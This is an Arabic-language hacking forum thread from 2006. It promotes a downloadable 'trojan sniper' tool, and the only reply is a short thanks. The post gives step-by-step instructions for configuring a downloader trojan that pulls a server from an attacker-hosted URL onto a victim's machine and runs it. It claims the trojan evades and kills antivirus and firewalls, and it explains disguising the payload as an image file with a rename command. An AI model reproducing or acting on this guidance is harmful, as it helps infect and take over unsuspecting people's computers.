منتديات اسايس لمغربية ترحب بكم


 
الرئيسيةالرئيسية  البوابةالبوابة  س .و .جس .و .ج  بحـثبحـث  التسجيلالتسجيل  الأعضاءالأعضاء  المجموعاتالمجموعات  دخولدخول  

شاطر | 
 

 من سلسلة تعلم الاختراق برنامج قناص التروجان

اذهب الى الأسفل 
كاتب الموضوعرسالة
maroc21

avatar

عدد الرسائل : 21
العمر : 27
تاريخ التسجيل : 16/12/2006

مُساهمةموضوع: من سلسلة تعلم الاختراق برنامج قناص التروجان   الإثنين ديسمبر 25, 2006 12:15 am

الرابط: http://www.geocities.com/dr_ahmedhamdy/tsniper.zip

قبل ان ابدء بالشرح اود ان اوضح بعض الملاحظات المهمة جدا والا لن يعمل البرنامج:
عندما تحمل البرنامج سوف ترى ملف اسمه actskn43.ocx ضعه في مجلد ال System
وبعد ذلك اغضط على زر ابدء (Start) ثم اختر تشغيل (Run) وبعد ذلك اكتب هذا
الامر : regsvr32 actskn43.ocx واضغط enter.
سوف يظهر ك مربع يقول لك تم تخزين الملف في الرجستري.
وبهذا سوف يعمل البرنامج بشكل جيد.

اما بالنسبة لمن واجه مشكلة ظهور علامات الاستفهام في البرنامج فاليتبع هذه الخطوات:
اضغط على زر ابدء (Start) ثم اختر لوحة التحكم (Control Panel) وبعد ذلك
افتح Regional Settings لا أعرف ما اسمه بااعربي ولكن ايقونته عى شكل الكرة الارضية
وفي هذا البرامج تجد خيارات اللغة غير الخيار الى Arabic وسوف يطلب منك
اعادة تشغيل الجهاز وبعد ذلك شغل البرنامج ولن ترى علامات الاستفهام.

والان سوف ابدء بالشرح:

وظيفة البرنامج : تحميل التروجان من الانترنت وتشغيله على جهاز الضحية.
حجم التروجان:46 كيلو بايت وبعد الضغط بالـ upx يصبح 22 كيلو بايت.
مواصفات التروجان : لا يكتشفه اي انتي فايروس وبه خاصية قتل الانتي فايروس
والفايروول.


ملاحظة مهمة جدا: لن يعمل البرنامج الا اذا وضعت هذا الملف actskn43.ocx في مجلد السيستم.


الأنظمة التي يعمل عليها التروجان: يعمل مئة بالمئة على ويندوز 98 و ميلنيوم
وهنالك احتمال كبير ان يحمل على الاكس بي.
لم تتوفر لي الفرصة في تجربة البرنامج على الاكس فأرجو من جربة البرنامج والسيرفر
على الاكس او ويندوز 2000 يخبرني بالنتيجة.


شرح البرنامج:
عندما تفتح البرنامج اضغط على قراءة الملف واختر ملف السيرفر ثم انتظر حتى يقرأ البيانات
وبعد ذلك غير ما يلزم في البرنامج واضغط على حفظ الملف وسوف تتم عملية حفظ البيانات على
نفس ملف السيرفر وليس في ملف جديد وبعد ذلك ارسل السيرفر.

عندما تتم عملية قراءة البيانات غير البيانات كما يلزم اتبع هذه الخطوات:
أولا: في خانة موقع السيرفر: اكتب الموقع الذي تريد ان يتم فيه تحميل السيرفر الى
جهاز الضحية مثلا: http://www.yoursite.com/trojan.exe
ثانيا: خانة اسم السيرفر بعد التحميل: هنا تكتب اسم السيرفر وهذا الاسم
هو اسم السيرفر بعد تحميل السيرفر على جهاز الضحية مثال:
التروجان حمل السيرفر من هذا الموقع http://www.yoursite.com/trojan.exe
نرى ان اسم السيرفر هنا trojan.exe واذا غيرت اسمه في خانة اسم السيرفر بعد
التحميل وجعلته مثلا server فإن اسم السيرفر في جهاز الضحية تكون server.exe
وليس trojan.exe أرجو اني وضحت الفكرة.

والآن نأتي الى نقطة مهمة جدا وهي ان بعض المواقع المجانية لا تدعك بتحميل
الملفات التنفيذية على سيرفرها اي هذا الامتداد exe لذا مع هذا البرنامج
لن تواجه اي مشكلة في ذلك تستطيع ان تغير امتداد السيرفر الذي تضعط على موقعك
الى اي امتداد واكرر مرة اخرى الى اي امتداد
يعني ممكن تجعله jpg او bmp او h او abcd أي امتداد حتى لو كان غير معروف
مهما كان الامتداد تستطيع تجعل الامتداد امتداد صورة....الخ وبذلك
تستطيع تحميل السيرفر الى الموقع المجاني لأن التروجان عندما ينتهي من تحميل
السيرفر الى جهاز الضحية يقوم بتغيير امتداده الى exe ثم يفتحه
ولتغيير الامتداد لا تستخدم البرامج لذلك استخدم الدوس هذا الامر:
rename server.exe server.jpg
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://www.chtoukamusic.max.st
shadowman

avatar

عدد الرسائل : 128
العمر : 28
Localisation : ton system32
تاريخ التسجيل : 02/11/2006

مُساهمةموضوع: رد: من سلسلة تعلم الاختراق برنامج قناص التروجان   الأحد يناير 07, 2007 10:47 pm

مشكــــــــــــــــــــــــــــــتووووووووووووووووور أخي

_________________
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://shadowman.on.ma
 
من سلسلة تعلم الاختراق برنامج قناص التروجان
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات اسايس لمغربية ترحب بكم :: منتديات الهاكرو الحماية :: منتدى الهــــاكــرالعام-
انتقل الى: